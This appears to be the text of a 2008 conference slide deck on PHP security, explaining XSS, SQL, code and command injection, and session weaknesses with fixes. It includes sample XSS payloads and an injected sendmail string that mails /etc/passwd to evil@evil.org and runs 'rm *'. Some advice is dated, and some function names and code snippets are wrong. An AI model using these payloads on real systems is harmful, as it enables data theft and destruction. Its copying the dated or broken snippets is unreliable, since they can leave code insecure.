Presented this on PHPCAMP pune, 2008

1. PHP Security
by
Uttam KUmar
Email:- trickyuk001@gmail.com
Mobile:- 8149253187

2. What is Security?
measurement…
safety…
protection…

3. Secure Web Applications
web security issues have to do with:
– hacker attacks
• denial of service
• server hijacking
– common threats
– compromise of data

4. PHP & Security
a growing language…
a major concern…

5. Never trust the web…
Input data validation
– register_globals = OFF
– $_REQUEST[] big NO NO …
– type casting input data
• No isNumeric() if data is numeric [locale problem]
• regularExp if data is string
– Path validation
• Always use basename()

6. Never trust the web…
• Content size validation
– use server side max length validation
– File Upload
• Check destination file size with $_FILES[‘name’][‘size’]
• I think Browser MIME header is reliable right ?
– Use getImageSize() in case of image
• External source upload like Avtar
– Make a local copy if path/of/file submitted from a URL.

7. XSS attack
– Can lead to embarrassment.
– Session take-over.
– Password theft.
– User tracking by 3rd
parties

8. XSS attack
Prevention is better than cure
– Use striptags()
• No tag allowance please
– Use htmlentities()
– Is $_SERVER safe ?
• Can be set…
• Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo
• $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo;
• $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo
– IP based info
• Use HTTP_X_FORWARDED_FOR
• Use long2ip()
– $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]);
– $sValidIp = long2ip(ip2long(array_pop($ipss)));

9. SQL Injection
WWW
– Arbitrary query execution
– Removal of data.
– Modification of existing values.
– Denial of service.
– Arbitrary data injection.

10. Preventing SQL injection
• Are magic quotes enough?
– use mysql_real_escape_string()
– use prepared statements
– avoid omitting single quotes
– LIKE quandary need addslashes()
– avoid printing query
– Authentication data storage
• Encrypt sensitive data to access database
• Make sure it’s only loaded for certain VirtualHost

11. Authentication Data Storage
SetEnv DB_LOGIN “login”
SetEnv DB_PASSWD “password”
Set Env DB_HOST “127.0.0.7”
<virtualHost iila.ws>
include /home/illa/sql.conf
</virtualHost>
$_SERVER[‘DB_LOGIN’]
$_SERVER[‘DB_PASSWD’]
/home/illa/sql.conf Apache server configuration
PHP file
Better Approach is to set these things under php’s ini directives
use php_admin_value mysql.default.user. “login”

12. Preventing code injection
– Path validation
– Validate fileName
$sFile = “D’sozaRes.doc’;
basename($sFile); //will return D’sozaRes.doc on *nix system
basename($sFile); //will return ’sozaRes.doc on win32
• Remove slashes
• Keep white list of file name
• Use full path
– Avoid variables in eval()
– Avoid using variable passed by users for regEx.

13. Command injection
– Use escapeshellcmd() and escapeshellarg()
– Use full path for command
– Set prority and memory limit for command
• shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);

14. Calling External Programs
<?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?>
The user could control $to to yield:
http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A
which would result in running the command:
/usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm *
a solution would be:
$fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);

15. Securing sessions
• Weakness of session
– Server side weakness…
• ls –l /tmp/sess_* //can reveal session info
– URL session exploitation
• Solution
– Native protection.
– Mixing security and convenience.
– Securing session storage path
– Check browser signature
– Referrer validation

16. Questions…????

17. Thank You !!